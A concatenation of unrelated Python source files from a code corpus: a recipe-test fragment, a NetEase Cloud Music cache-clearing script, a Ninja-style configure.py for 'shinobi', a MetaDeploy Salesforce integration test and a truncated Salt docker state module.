['test1_exparchive', 'test2_exparchive'],
['test1_exparchive', 'test2_exparchive'])
yield make_test(
'exparchive-multi-miss',
[],
['test1_exparchive', 'test2_exparchive'],
['test1_exparchive'])
# Mixed
yield make_test(
'exparchive-batch',
['test1', 'test2'],
['test_exparchive'],
['test1', 'test2', 'test_exparchive'])
yield make_test(
'exparchive-batch-bmiss',
['test1', 'test2'],
['test_exparchive'],
['test1', 'test_exparchive'])
yield make_test(
'exparchive-batch-emiss',
['test1', 'test2'],
['test_exparchive'],
['test1', 'test2'])
# Use force-exparchive
yield make_test(
'always-use-exparchive',
[],
['test_exparchive', 'test1', 'test2'],
['test_exparchive', 'test1', 'test2']) + api.properties(
always_use_exparchive=True)
|
py | 7dfa01ca2f2ff1af004c156f75b46d79f1d25f4f | # -*- coding: utf-8 -*-
"""
Created on Wed Dec 3 15:01:34 2014
@author: Matti Ropo
@author: Henrik Levämäki
"""
from pyemto.latticeinputs.latticeinputs import Latticeinputs
|
py | 7dfa0311d68f0f6de5e15947cb1b38a46eb339b5 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Date : 2019-04-26 11:38:54
# @Author : Lewis Tian ([email protected])
# @Link : https://github.com/taseikyo
# @Version : Python3.7
import os
import sys
"""
Clear the netease-cloud-music cache to fix the `load music failed` error.
Default cache path:
`c:/users/xyz/appdata/local/netease/cloudmusic/cache`
"""
def clear_netease_cloud_music_cache(path: str = ".") -> None:
"""
$path: music cache path
"""
for file in os.listdir(path):
if os.path.isdir(f"{path}/{file}"):
clear_netease_cloud_music_cache(f"{path}/{file}")
else:
try:
os.remove(f"{path}/{file}")
            except OSError:
                print(f"cannot remove `{path}/{file}`")
if __name__ == "__main__":
if len(sys.argv) < 2:
path = f"{os.environ['LOCALAPPDATA']}/netease/cloudmusic/cache"
else:
path = sys.argv[1]
clear_netease_cloud_music_cache(path)
|
py | 7dfa03ac9da7432d0763fe59ca5db422cf7de779 | from happy_bittorrent.algorithms.torrent_manager import *
|
py | 7dfa04db74c583287c261b7062c400e70518a05a | #!/usr/bin/env python
#
# Copyright 2001 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Script that generates the build.ninja for shinobi itself.
Projects that use shinobi themselves should either write a similar script
or use a meta-build system that supports Ninja output."""
from __future__ import print_function
from optparse import OptionParser
import os
import pipes
import string
import subprocess
import sys
sourcedir = os.path.dirname(os.path.realpath(__file__))
sys.path.insert(0, os.path.join(sourcedir, 'misc'))
import ninja_syntax
class Platform(object):
"""Represents a host/target platform and its specific build attributes."""
def __init__(self, platform):
self._platform = platform
if self._platform is not None:
return
self._platform = sys.platform
if self._platform.startswith('linux'):
self._platform = 'linux'
elif self._platform.startswith('freebsd'):
self._platform = 'freebsd'
elif self._platform.startswith('gnukfreebsd'):
self._platform = 'freebsd'
elif self._platform.startswith('openbsd'):
self._platform = 'openbsd'
elif self._platform.startswith('solaris') or self._platform == 'sunos5':
self._platform = 'solaris'
elif self._platform.startswith('mingw'):
self._platform = 'mingw'
elif self._platform.startswith('win'):
self._platform = 'msvc'
elif self._platform.startswith('bitrig'):
self._platform = 'bitrig'
elif self._platform.startswith('netbsd'):
self._platform = 'netbsd'
elif self._platform.startswith('aix'):
self._platform = 'aix'
elif self._platform.startswith('os400'):
self._platform = 'os400'
elif self._platform.startswith('dragonfly'):
self._platform = 'dragonfly'
@staticmethod
def known_platforms():
return ['linux', 'darwin', 'freebsd', 'openbsd', 'solaris', 'sunos5',
'mingw', 'msvc', 'gnukfreebsd', 'bitrig', 'netbsd', 'aix',
'dragonfly']
def platform(self):
return self._platform
def is_linux(self):
return self._platform == 'linux'
def is_mingw(self):
return self._platform == 'mingw'
def is_msvc(self):
return self._platform == 'msvc'
def msvc_needs_fs(self):
popen = subprocess.Popen(['cl', '/nologo', '/?'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
out, err = popen.communicate()
return b'/FS' in out
def is_windows(self):
return self.is_mingw() or self.is_msvc()
def is_solaris(self):
return self._platform == 'solaris'
def is_aix(self):
return self._platform == 'aix'
def is_os400_pase(self):
return self._platform == 'os400' or os.uname().sysname.startswith('OS400')
def uses_usr_local(self):
return self._platform in ('freebsd', 'openbsd', 'bitrig', 'dragonfly', 'netbsd')
def supports_ppoll(self):
return self._platform in ('freebsd', 'linux', 'openbsd', 'bitrig',
'dragonfly')
def supports_ninja_browse(self):
return (not self.is_windows()
and not self.is_solaris()
and not self.is_aix())
def can_rebuild_in_place(self):
return not (self.is_windows() or self.is_aix())
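# A quick sketch of how the Platform helper above is typically queried; the
# printed values depend on the machine running configure.
def _describe_host_platform():
    p = Platform(None)
    print('platform:       ', p.platform())
    print('is_windows:     ', p.is_windows())
    print('supports_ppoll: ', p.supports_ppoll())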
class Bootstrap:
"""API shim for ninja_syntax.Writer that instead runs the commands.
Used to bootstrap Ninja from scratch. In --bootstrap mode this
class is used to execute all the commands to build an executable.
It also proxies all calls to an underlying ninja_syntax.Writer, to
behave like non-bootstrap mode.
"""
def __init__(self, writer, verbose=False):
self.writer = writer
self.verbose = verbose
# Map of variable name => expanded variable value.
self.vars = {}
# Map of rule name => dict of rule attributes.
self.rules = {
'phony': {}
}
def comment(self, text):
return self.writer.comment(text)
def newline(self):
return self.writer.newline()
def variable(self, key, val):
# In bootstrap mode, we have no shinobi process to catch /showIncludes
# output.
self.vars[key] = self._expand(val).replace('/showIncludes', '')
return self.writer.variable(key, val)
def rule(self, name, **kwargs):
self.rules[name] = kwargs
return self.writer.rule(name, **kwargs)
def build(self, outputs, rule, inputs=None, **kwargs):
ruleattr = self.rules[rule]
cmd = ruleattr.get('command')
if cmd is None: # A phony rule, for example.
return
# Implement just enough of Ninja variable expansion etc. to
# make the bootstrap build work.
local_vars = {
'in': self._expand_paths(inputs),
'out': self._expand_paths(outputs)
}
for key, val in kwargs.get('variables', []):
local_vars[key] = ' '.join(ninja_syntax.as_list(val))
self._run_command(self._expand(cmd, local_vars))
return self.writer.build(outputs, rule, inputs, **kwargs)
def default(self, paths):
return self.writer.default(paths)
def _expand_paths(self, paths):
"""Expand $vars in an array of paths, e.g. from a 'build' block."""
paths = ninja_syntax.as_list(paths)
return ' '.join(map(self._shell_escape, (map(self._expand, paths))))
def _expand(self, str, local_vars={}):
"""Expand $vars in a string."""
return ninja_syntax.expand(str, self.vars, local_vars)
def _shell_escape(self, path):
"""Quote paths containing spaces."""
return '"%s"' % path if ' ' in path else path
def _run_command(self, cmdline):
"""Run a subcommand, quietly. Prints the full command on error."""
try:
if self.verbose:
print(cmdline)
subprocess.check_call(cmdline, shell=True)
except subprocess.CalledProcessError:
print('when running: ', cmdline)
raise
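# A small sketch of the bootstrap flow: the Bootstrap shim records variables
# and rules, runs each build command immediately, and still writes the same
# statements through the wrapped ninja_syntax.Writer.  File names here are
# hypothetical.
def _bootstrap_sketch():
    writer = ninja_syntax.Writer(open('bootstrap.ninja', 'w'))
    b = Bootstrap(writer, verbose=True)
    b.variable('cxx', 'g++')
    b.rule('cxx', command='$cxx -c $in -o $out')
    b.build('hello.o', 'cxx', 'hello.cc')  # also runs: g++ -c hello.cc -o hello.o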
parser = OptionParser()
profilers = ['gmon', 'pprof']
parser.add_option('--bootstrap', action='store_true',
help='bootstrap a shinobi binary from nothing')
parser.add_option('--verbose', action='store_true',
help='enable verbose build')
parser.add_option('--platform',
help='target platform (' +
'/'.join(Platform.known_platforms()) + ')',
choices=Platform.known_platforms())
parser.add_option('--host',
help='host platform (' +
'/'.join(Platform.known_platforms()) + ')',
choices=Platform.known_platforms())
parser.add_option('--debug', action='store_true',
help='enable debugging extras',)
parser.add_option('--profile', metavar='TYPE',
choices=profilers,
help='enable profiling (' + '/'.join(profilers) + ')',)
parser.add_option('--with-gtest', metavar='PATH', help='ignored')
parser.add_option('--with-python', metavar='EXE',
help='use EXE as the Python interpreter',
default=os.path.basename(sys.executable))
parser.add_option('--force-pselect', action='store_true',
help='ppoll() is used by default where available, '
'but some platforms may need to use pselect instead',)
(options, args) = parser.parse_args()
if args:
print('ERROR: extra unparsed command-line arguments:', args)
sys.exit(1)
platform = Platform(options.platform)
if options.host:
host = Platform(options.host)
else:
host = platform
BUILD_FILENAME = 'build.ninja'
shinobi_writer = ninja_syntax.Writer(open(BUILD_FILENAME, 'w'))
n = shinobi_writer
if options.bootstrap:
# Make the build directory.
try:
os.mkdir('build')
except OSError:
pass
# Wrap shinobi_writer with the Bootstrapper, which also executes the
# commands.
print('bootstrapping shinobi...')
n = Bootstrap(n, verbose=options.verbose)
n.comment('This file is used to build shinobi itself.')
n.comment('It is generated by ' + os.path.basename(__file__) + '.')
n.newline()
n.variable('ninja_required_version', '1.3')
n.newline()
n.comment('The arguments passed to configure.py, for rerunning it.')
configure_args = sys.argv[1:]
if '--bootstrap' in configure_args:
configure_args.remove('--bootstrap')
n.variable('configure_args', ' '.join(configure_args))
env_keys = set(['CXX', 'AR', 'CFLAGS', 'CXXFLAGS', 'LDFLAGS'])
configure_env = dict((k, os.environ[k]) for k in os.environ if k in env_keys)
if configure_env:
config_str = ' '.join([k + '=' + pipes.quote(configure_env[k])
for k in configure_env])
n.variable('configure_env', config_str + '$ ')
n.newline()
CXX = configure_env.get('CXX', 'g++')
objext = '.o'
if platform.is_msvc():
CXX = 'cl'
objext = '.obj'
def src(filename):
return os.path.join('$root', 'src', filename)
def built(filename):
return os.path.join('$builddir', filename)
def doc(filename):
return os.path.join('$root', 'doc', filename)
def cc(name, **kwargs):
return n.build(built(name + objext), 'cxx', src(name + '.c'), **kwargs)
def cxx(name, **kwargs):
return n.build(built(name + objext), 'cxx', src(name + '.cc'), **kwargs)
def binary(name):
if platform.is_windows():
exe = name + '.exe'
n.build(name, 'phony', exe)
return exe
return name
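# For orientation: with the helpers above, cxx('graph') emits a build edge
# roughly equivalent to
#   build $builddir/graph.o: cxx $root/src/graph.cc
# (graph.obj when compiling with MSVC), and binary('shinobi') returns
# 'shinobi.exe' plus a phony 'shinobi' alias on Windows, or just 'shinobi'
# elsewhere.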
root = sourcedir
if root == os.getcwd():
# In the common case where we're building directly in the source
# tree, simplify all the paths to just be cwd-relative.
root = '.'
n.variable('root', root)
n.variable('builddir', 'build')
n.variable('cxx', CXX)
if platform.is_msvc():
n.variable('ar', 'link')
else:
n.variable('ar', configure_env.get('AR', 'ar'))
if platform.is_msvc():
cflags = ['/showIncludes',
'/nologo', # Don't print startup banner.
'/Zi', # Create pdb with debug info.
'/W4', # Highest warning level.
'/WX', # Warnings as errors.
'/wd4530', '/wd4100', '/wd4706', '/wd4244',
'/wd4512', '/wd4800', '/wd4702', '/wd4819',
# Disable warnings about constant conditional expressions.
'/wd4127',
# Disable warnings about passing "this" during initialization.
'/wd4355',
# Disable warnings about ignored typedef in DbgHelp.h
'/wd4091',
# Disable size_t -> int truncation warning.
# We never have strings or arrays larger than 2**31.
'/wd4267',
'/DNOMINMAX', '/D_CRT_SECURE_NO_WARNINGS',
'/DNINJA_PYTHON="%s"' % options.with_python]
if platform.msvc_needs_fs():
cflags.append('/FS')
ldflags = ['/DEBUG', '/libpath:$builddir']
if not options.debug:
cflags += ['/Ox', '/DNDEBUG', '/GL']
ldflags += ['/LTCG', '/OPT:REF', '/OPT:ICF']
else:
cflags = ['-g', '-Wall', '-Wextra',
'-Wno-deprecated',
'-Wno-missing-field-initializers',
'-Wno-unused-parameter',
'-fvisibility=hidden', '-pipe',
'-std=c++17',
'-DNINJA_PYTHON="%s"' % options.with_python]
if options.debug:
cflags += ['-D_GLIBCXX_DEBUG', '-D_GLIBCXX_DEBUG_PEDANTIC']
else:
cflags += ['-O2', '-DNDEBUG']
try:
proc = subprocess.Popen(
[CXX, '-fdiagnostics-color', '-c', '-x', 'c++', '/dev/null',
'-o', '/dev/null'],
stdout=open(os.devnull, 'wb'), stderr=subprocess.STDOUT)
if proc.wait() == 0:
cflags += ['-fdiagnostics-color']
except:
pass
if platform.is_mingw():
cflags += ['-D_WIN32_WINNT=0x0601', '-D__USE_MINGW_ANSI_STDIO=1']
ldflags = ['-L$builddir', '-lboost_system', '-pthread']
if platform.uses_usr_local():
cflags.append('-I/usr/local/include')
ldflags.append('-L/usr/local/lib')
if platform.is_aix():
# printf formats for int64_t, uint64_t; large file support
cflags.append('-D__STDC_FORMAT_MACROS')
cflags.append('-D_LARGE_FILES')
libs = []
if platform.is_mingw():
    cflags.remove('-fvisibility=hidden')
ldflags.append('-static')
elif platform.is_solaris():
cflags.remove('-fvisibility=hidden')
elif platform.is_aix():
cflags.remove('-fvisibility=hidden')
elif platform.is_msvc():
pass
else:
if options.profile == 'gmon':
cflags.append('-pg')
ldflags.append('-pg')
elif options.profile == 'pprof':
cflags.append('-fno-omit-frame-pointer')
libs.extend(['-Wl,--no-as-needed', '-lprofiler'])
if platform.supports_ppoll() and not options.force_pselect:
cflags.append('-DUSE_PPOLL')
if platform.supports_ninja_browse():
cflags.append('-DNINJA_HAVE_BROWSE')
# Search for generated headers relative to build dir.
cflags.append('-I.')
def shell_escape(str):
"""Escape str such that it's interpreted as a single argument by
the shell."""
# This isn't complete, but it's just enough to make NINJA_PYTHON work.
if platform.is_windows():
return str
if '"' in str:
return "'%s'" % str.replace("'", "\\'")
return str
if 'CFLAGS' in configure_env:
cflags.append(configure_env['CFLAGS'])
ldflags.append(configure_env['CFLAGS'])
if 'CXXFLAGS' in configure_env:
cflags.append(configure_env['CXXFLAGS'])
ldflags.append(configure_env['CXXFLAGS'])
n.variable('cflags', ' '.join(shell_escape(flag) for flag in cflags))
if 'LDFLAGS' in configure_env:
ldflags.append(configure_env['LDFLAGS'])
n.variable('ldflags', ' '.join(shell_escape(flag) for flag in ldflags))
n.newline()
if platform.is_msvc():
n.rule('cxx',
command='$cxx $cflags -c $in /Fo$out /Fd' + built('$pdb'),
description='CXX $out',
deps='msvc' # /showIncludes is included in $cflags.
)
else:
n.rule('cxx',
command='$cxx -MMD -MT $out -MF $out.d $cflags -c $in -o $out',
depfile='$out.d',
deps='gcc',
description='CXX $out')
n.newline()
if host.is_msvc():
n.rule('ar',
command='lib /nologo /ltcg /out:$out $in',
description='LIB $out')
elif host.is_mingw():
n.rule('ar',
command='$ar crs $out $in',
description='AR $out')
else:
n.rule('ar',
command='rm -f $out && $ar crs $out $in',
description='AR $out')
n.newline()
if platform.is_msvc():
n.rule('link',
command='$cxx $in $libs /nologo /link $ldflags /out:$out',
description='LINK $out')
else:
n.rule('link',
command='$cxx $ldflags -o $out $in $libs',
description='LINK $out')
n.newline()
objs = []
if platform.supports_ninja_browse():
n.comment('browse_py.h is used to inline browse.py.')
n.rule('inline',
command='"%s"' % src('inline.sh') + ' $varname < $in > $out',
description='INLINE $out')
n.build(built('browse_py.h'), 'inline', src('browse.py'),
implicit=src('inline.sh'),
variables=[('varname', 'kBrowsePy')])
n.newline()
objs += cxx('browse', order_only=built('browse_py.h'))
n.newline()
n.comment('the depfile parser and shinobi lexers are generated using re2c.')
def has_re2c():
try:
proc = subprocess.Popen(['re2c', '-V'], stdout=subprocess.PIPE)
return int(proc.communicate()[0], 10) >= 1103
except OSError:
return False
if has_re2c():
n.rule('re2c',
command='re2c -b -i --no-generation-date -o $out $in',
description='RE2C $out')
# Generate the .cc files in the source directory so we can check them in.
n.build(src('depfile_parser.cc'), 're2c', src('depfile_parser.in.cc'))
n.build(src('lexer.cc'), 're2c', src('lexer.in.cc'))
else:
print("warning: A compatible version of re2c (>= 0.11.3) was not found; "
"changes to src/*.in.cc will not affect your build.")
n.newline()
n.comment('Core source files all build into the daemon library')
cxxvariables = []
if platform.is_msvc():
cxxvariables = [('pdb', 'daemon.pdb')]
for name in ['daemon', 'dcache']:
objs += cxx(name, variables=cxxvariables)
if platform.is_msvc():
daemon_lib = n.build(built('daemon.lib'), 'ar', objs)
else:
daemon_lib = n.build(built('libdaemon.a'), 'ar', objs)
n.newline()
if platform.is_msvc():
libs.append('daemon.lib')
else:
libs.append('-ldaemon')
all_targets = []
n.comment('Distributed build support')
objs = cxx('daemon_exec', variables=cxxvariables)
all_targets += n.build(binary('daemon_exec'), 'link', objs, implicit=daemon_lib, variables=[('libs', libs)])
n.newline()
n.comment('Core source files all build into shinobi library.')
objs = []
cxxvariables = []
if platform.is_msvc():
cxxvariables = [('pdb', 'ninja.pdb')]
for name in ['build',
'build_log',
'clean',
'clparser',
'debug_flags',
'depfile_parser',
'deps_log',
'disk_interface',
'dyndep',
'dyndep_parser',
'edit_distance',
'eval_env',
'graph',
'graphviz',
'host_parser',
'lexer',
'line_printer',
'manifest_parser',
'metrics',
'parser',
'state',
'string_view_util',
'util',
'version']:
objs += cxx(name, variables=cxxvariables)
if platform.is_windows():
for name in ['subprocess-win32',
'includes_normalize-win32',
'msvc_helper-win32',
'msvc_helper_main-win32']:
objs += cxx(name, variables=cxxvariables)
if platform.is_msvc():
objs += cxx('minidump-win32', variables=cxxvariables)
objs += cc('getopt')
else:
objs += cxx('subprocess-posix')
if platform.is_aix():
objs += cc('getopt')
if platform.is_msvc():
shinobi_lib = n.build(built('shinobi.lib'), 'ar', objs)
else:
shinobi_lib = n.build(built('libshinobi.a'), 'ar', objs)
n.newline()
if platform.is_msvc():
libs.append('shinobi.lib')
else:
libs.append('-lshinobi')
if platform.is_aix() and not platform.is_os400_pase():
libs.append('-lperfstat')
n.comment('Main executable is library plus main() function.')
objs = cxx('ninja', variables=cxxvariables)
shinobi = n.build(binary('shinobi'), 'link', objs, implicit=shinobi_lib,
variables=[('libs', libs)])
n.newline()
all_targets += shinobi
if options.bootstrap:
# We've built the shinobi binary. Don't run any more commands
# through the bootstrap executor, but continue writing the
# build.ninja file.
n = shinobi_writer
n.comment('Tests all build into shinobi_test executable.')
objs = []
if platform.is_msvc():
cxxvariables = [('pdb', 'shinobi_test.pdb')]
for name in ['build_log_test',
'build_test',
'clean_test',
'clparser_test',
'dcache_test',
'depfile_parser_test',
'deps_log_test',
'dyndep_parser_test',
'disk_interface_test',
'edit_distance_test',
'graph_test',
'host_parser_test',
'lexer_test',
'manifest_parser_test',
'ninja_test',
'state_test',
'string_view_util_test',
'subprocess_test',
'test',
'util_test']:
objs += cxx(name, variables=cxxvariables)
if platform.is_windows():
for name in ['includes_normalize_test', 'msvc_helper_test']:
objs += cxx(name, variables=cxxvariables)
shinobi_test = n.build(binary('shinobi_test'), 'link', objs, implicit=shinobi_lib,
variables=[('libs', libs)])
n.newline()
all_targets += shinobi_test
n.comment('Ancillary executables.')
for name in ['build_log_perftest',
'canon_perftest',
'depfile_parser_perftest',
'hash_collision_bench',
'manifest_parser_perftest',
'clparser_perftest']:
if platform.is_msvc():
cxxvariables = [('pdb', name + '.pdb')]
objs = cxx(name, variables=cxxvariables)
all_targets += n.build(binary(name), 'link', objs,
implicit=shinobi_lib, variables=[('libs', libs)])
n.newline()
n.comment('Generate a graph using the "graph" tool.')
n.rule('gendot',
command='./shinobi -t graph all > $out')
n.rule('gengraph',
command='dot -Tpng $in > $out')
dot = n.build(built('graph.dot'), 'gendot', ['shinobi', 'build.ninja'])
n.build('graph.png', 'gengraph', dot)
n.newline()
n.comment('Generate the manual using asciidoc.')
n.rule('asciidoc',
command='asciidoc -b docbook -d book -o $out $in',
description='ASCIIDOC $out')
n.rule('xsltproc',
command='xsltproc --nonet doc/docbook.xsl $in > $out',
description='XSLTPROC $out')
docbookxml = n.build(built('manual.xml'), 'asciidoc', doc('manual.asciidoc'))
manual = n.build(doc('manual.html'), 'xsltproc', docbookxml,
implicit=[doc('style.css'), doc('docbook.xsl')])
n.build('manual', 'phony',
order_only=manual)
n.newline()
n.rule('dblatex',
command='dblatex -q -o $out -p doc/dblatex.xsl $in',
description='DBLATEX $out')
n.build(doc('manual.pdf'), 'dblatex', docbookxml,
implicit=[doc('dblatex.xsl')])
n.comment('Generate Doxygen.')
n.rule('doxygen',
command='doxygen $in',
description='DOXYGEN $in')
n.variable('doxygen_mainpage_generator',
src('gen_doxygen_mainpage.sh'))
n.rule('doxygen_mainpage',
command='$doxygen_mainpage_generator $in > $out',
description='DOXYGEN_MAINPAGE $out')
mainpage = n.build(built('doxygen_mainpage'), 'doxygen_mainpage',
['README', 'COPYING'],
implicit=['$doxygen_mainpage_generator'])
n.build('doxygen', 'doxygen', doc('doxygen.config'),
implicit=mainpage)
n.newline()
if not host.is_mingw():
n.comment('Regenerate build files if build script changes.')
n.rule('configure',
command='${configure_env}%s $root/configure.py $configure_args' %
options.with_python,
generator=True)
n.build('build.ninja', 'configure',
implicit=['$root/configure.py',
os.path.normpath('$root/misc/ninja_syntax.py')])
n.newline()
n.default(shinobi)
n.newline()
if host.is_linux():
n.comment('Packaging')
n.rule('rpmbuild',
command="misc/packaging/rpmbuild.sh",
description='Building rpms..')
n.build('rpm', 'rpmbuild')
n.newline()
n.build('all', 'phony', all_targets)
n.close()
print('wrote %s.' % BUILD_FILENAME)
if options.bootstrap:
print('bootstrap complete. rebuilding...')
rebuild_args = []
if platform.can_rebuild_in_place():
rebuild_args.append('./shinobi')
else:
if platform.is_windows():
bootstrap_exe = 'shinobi.bootstrap.exe'
final_exe = 'shinobi.exe'
else:
bootstrap_exe = './shinobi.bootstrap'
final_exe = './shinobi'
if os.path.exists(bootstrap_exe):
os.unlink(bootstrap_exe)
os.rename(final_exe, bootstrap_exe)
rebuild_args.append(bootstrap_exe)
if options.verbose:
rebuild_args.append('-v')
subprocess.check_call(rebuild_args)
|
py | 7dfa05177526591a4751773edc42692b1b6eab54 | """
These are end-to-end integration tests that touch stateful resources,
like a Salesforce org. They should be run with caution, and needn't be
run on every test run.
"""
from os import environ
import pytest
from django.core.exceptions import ImproperlyConfigured
from metadeploy.api.jobs import run_flows
from metadeploy.api.models import Job
def env(name):
try:
return environ[name]
except KeyError:
raise ImproperlyConfigured(
f"Cannot run integration tests. Missing environment variable: {name}."
)
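# For reference, the test below reads these variables (values shown here are
# placeholders, not real credentials):
#   TEST_INSTANCE_URL=https://example-dev-ed.my.salesforce.com
#   TEST_ORGANIZATION_ID=00Dxxxxxxxxxxxxxxx
#   TEST_TOKEN=<OAuth access token>
#   TEST_TOKEN_SECRET=<OAuth token secret>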
@pytest.mark.integration
@pytest.mark.django_db
def test_can_reach_salesforce(
social_token_factory,
social_account_factory,
job_factory,
user_factory,
plan_factory,
step_factory,
version_factory,
product_factory,
):
# Ensure 12-factor-esque values are found:
INSTANCE_URL = env("TEST_INSTANCE_URL")
ORGANIZATION_ID = env("TEST_ORGANIZATION_ID")
TOKEN = env("TEST_TOKEN")
TOKEN_SECRET = env("TEST_TOKEN_SECRET")
user = user_factory(socialaccount_set=[])
social_account = social_account_factory(
user=user,
extra_data={
"instance_url": INSTANCE_URL,
"organization_details": {
"Id": ORGANIZATION_ID,
"Name": "Oddbird",
"OrganizationType": "Developer Edition",
},
},
socialtoken_set=[],
)
social_token_factory(account=social_account, token=TOKEN, token_secret=TOKEN_SECRET)
product = product_factory(repo_url="https://github.com/SFDO-Tooling/CumulusCI-Test")
version = version_factory(commit_ish="feature/preflight", product=product)
plan = plan_factory(version=version)
steps = [step_factory(plan=plan)]
job = job_factory(user=user)
run_flows(
user=user,
plan=plan,
skip_tasks=steps,
organization_url=INSTANCE_URL,
result_class=Job,
result_id=job.id,
)
|
py | 7dfa05abf1580dff82d0cf1f0b537438980a04bf | # -*- coding: utf-8 -*-
'''
Manage Docker containers
========================
.. deprecated:: 2015.8.0
Future feature development will be done only in :mod:`dockerng
<salt.states.dockerng>`. See the documentation for this module for
information on the deprecation path.
`Docker <https://www.docker.io>`_
is a lightweight, portable, self-sufficient software container
wrapper. The base supported wrapper types are
`LXC <https://en.wikipedia.org/wiki/Linux_Containers>`_,
`cgroups <https://en.wikipedia.org/wiki/Cgroups>`_, and the
`Linux Kernel <https://en.wikipedia.org/wiki/Linux_kernel>`_.
.. note::
This state module requires
`docker-py <https://github.com/dotcloud/docker-py>`_ version >= 0.6.0
which supports `Docker Remote API version 1.12
<http://docs.docker.io/en/latest/reference/api/docker_remote_api_v1.6>`_.
Available Functions
-------------------
- built
.. code-block:: yaml
corp/mysuperdocker_img:
docker.built:
- path: /path/to/dir/container
- pulled
.. code-block:: yaml
ubuntu:
docker.pulled:
- tag: latest
- pushed
.. code-block:: yaml
corp/mysuperdocker_img:
docker.pushed
- installed
.. code-block:: yaml
mysuperdocker-container:
docker.installed:
- name: mysuperdocker
- hostname: superdocker
- image: corp/mysuperdocker_img
- loaded
.. code-block:: yaml
mysuperdocker-file:
docker.loaded:
- name: mysuperdocker
- source: salt://_files/tmp/docker_image.tar
- running
.. code-block:: yaml
my_service:
docker.running:
- container: mysuperdocker
- image: corp/mysuperdocker_img
- ports:
- "5000/tcp":
HostIp: ""
HostPort: "5000"
.. note::
The ``ports`` argument above is a dictionary. The double
indentation is required for PyYAML to load the data structure
properly as a python dictionary. More information can be found
:ref:`here <nested-dict-indentation>`
- absent
.. code-block:: yaml
mys_old_uperdocker:
docker.absent
- run
.. code-block:: yaml
/finish-install.sh:
docker.run:
- cid: mysuperdocker
- unless: grep -q something /var/log/foo
- docker_unless: grep -q done /install_log
Use Cases
---------
Ensures the container is running with the latest image available
.. code-block:: yaml
my-service-image:
docker.pulled:
- name: registry/my-service:latest
- force: true
my-service-container:
docker.installed:
- image: registry/my-service:latest
- watch:
- docker: my-service-image
my-service:
docker.running:
- container: my-service-container
- watch:
- docker: my-service-container
.. note::
The docker modules are named ``dockerio`` because
the name 'docker' would conflict with the underlying docker-py library.
'''
from __future__ import absolute_import
import functools
import logging
# Import salt libs
from salt.ext.six import string_types
import salt.utils
import salt.ext.six as six
# Enable proper logging
log = logging.getLogger(__name__)
# Define the module's virtual name
__virtualname__ = 'docker'
def __virtual__():
'''
Only load if the dockerio execution module is available
'''
if 'docker.version' in __salt__:
return __virtualname__
return False
INVALID_RESPONSE = 'We did not get an acceptable answer from docker'
VALID_RESPONSE = ''
NOTSET = object()
def _ret_status(exec_status=None,
name='',
comment='',
result=None,
changes=None):
if not changes:
changes = {}
if exec_status is None:
exec_status = {}
if exec_status:
if result is None:
result = exec_status['status']
scomment = exec_status.get('comment', None)
if scomment:
comment += '\n' + scomment
out = exec_status.get('out', None)
if out:
if isinstance(out, string_types):
comment += '\n' + out
return {
'changes': changes,
'result': result,
'name': name,
'comment': comment,
}
def _valid(exec_status=None, name='', comment='', changes=None):
return _ret_status(exec_status=exec_status,
comment=comment,
name=name,
changes=changes,
result=True)
def _invalid(exec_status=None, name='', comment='', changes=None):
return _ret_status(exec_status=exec_status,
comment=comment,
name=name,
changes=changes,
result=False)
def _get_image_name(image, tag):
    '''
    Return the image reference as ``image:tag``, unless the image name
    already contains a tag, in which case it is returned unchanged.
    '''
    if ':' not in image:
        # backward compatibility: name could be already tagged
        return ':'.join((image, tag))
    return image
def _parse_volumes(volumes):
'''
Parse a given volumes state specification for later use in
modules.docker.create_container(). This produces a dict that can be directly
consumed by the Docker API /containers/create.
Note: this only really exists for backwards-compatibility, and because
modules.dockerio.start() currently takes a binds argument.
volumes
A structure containing information about the volumes to be included in the
container that will be created, either:
- a bare dictionary
- a list of dictionaries and lists
.. code-block:: yaml
# bare dict style
- volumes:
/usr/local/etc/ssl/certs/example.crt:
bind: /etc/ssl/certs/com.example.internal.crt
ro: True
/var/run:
bind: /var/run/host/
ro: False
# list of dicts style:
- volumes:
- /usr/local/etc/ssl/certs/example.crt:
bind: /etc/ssl/certs/com.example.internal.crt
ro: True
- /var/run: /var/run/host/ # read-write bound volume
- /var/lib/mysql # un-bound, container-only volume
note: bind mounts specified like "/etc/timezone:/tmp/host_tz" will fall
through this parser.
Returns a dict of volume specifications:
.. code-block:: yaml
{
'bindvols': {
'/usr/local/etc/ssl/certs/example.crt': {
'bind': '/etc/ssl/certs/com.example.internal.crt',
'ro': True
},
'/var/run/': {
'bind': '/var/run/host',
'ro': False
},
},
'contvols': [ '/var/lib/mysql/' ]
}
'''
log.trace("Parsing given volumes dict: " + str(volumes))
bindvolumes = {}
contvolumes = []
if isinstance(volumes, dict):
# If volumes as a whole is a dict, then there's no way to specify a non-bound volume
# so we exit early and assume the dict is properly formed.
bindvolumes = volumes
if isinstance(volumes, list):
for vol in volumes:
if isinstance(vol, dict):
for volsource, voldef in vol.items():
if isinstance(voldef, dict):
target = voldef['bind']
read_only = voldef.get('ro', False)
else:
target = str(voldef)
read_only = False
source = volsource
            else:  # not a dict: plain string volume spec
if ':' in vol:
volspec = vol.split(':')
source = volspec[0]
target = volspec[1]
read_only = False
try:
if len(volspec) > 2:
read_only = volspec[2] == "ro"
except IndexError:
pass
else:
contvolumes.append(str(vol))
continue
bindvolumes[source] = {
'bind': target,
'ro': read_only
}
result = {'bindvols': bindvolumes, 'contvols': contvolumes}
log.trace("Finished parsing volumes, with result: " + str(result))
return result
def mod_watch(name, sfun=None, *args, **kw):
if sfun == 'built':
# Needs to refresh the image
kw['force'] = True
build_status = built(name, **kw)
result = build_status['result']
status = _ret_status(build_status, name, result=result,
changes={name: result})
return status
elif sfun == 'installed':
# Throw away the old container and create a new one
remove_container = __salt__['docker.remove_container']
remove_status = _ret_status(remove_container(container=name,
force=True),
name=name)
installed_status = installed(name=name, **kw)
result = installed_status['result'] and remove_status['result']
comment = remove_status['comment']
status = _ret_status(installed_status, name=name,
result=result,
changes={name: result},
comment=comment)
return status
elif sfun == 'running':
# Force a restart or kill the container
container = kw.get('container', name)
kill_signal = kw.get('kill_signal')
